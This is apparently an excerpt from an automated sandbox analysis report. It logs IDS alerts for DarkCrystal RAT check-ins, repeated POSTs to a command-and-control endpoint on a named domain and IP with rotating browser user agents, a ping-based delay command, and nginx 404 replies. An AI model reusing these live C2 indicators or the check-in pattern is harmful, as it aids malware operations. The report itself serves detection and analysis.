Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49782 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49798 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49834 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49865 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49992 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50016 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50015 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50011 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50014 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50017 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50013 -> 185.158.202.52:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50012 -> 185.158.202.52:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: PREVIDER-ASNL PREVIDER-ASNL

Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 337703cm.n9sh.top

Source: unknown

HTTP traffic detected: POST /Basecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 337703cm.n9sh.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:32:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:32:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:32:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:33:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:33:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:33:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:33:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:33:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:33:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:33:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:33:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:34:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:34:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:34:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 09:34:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

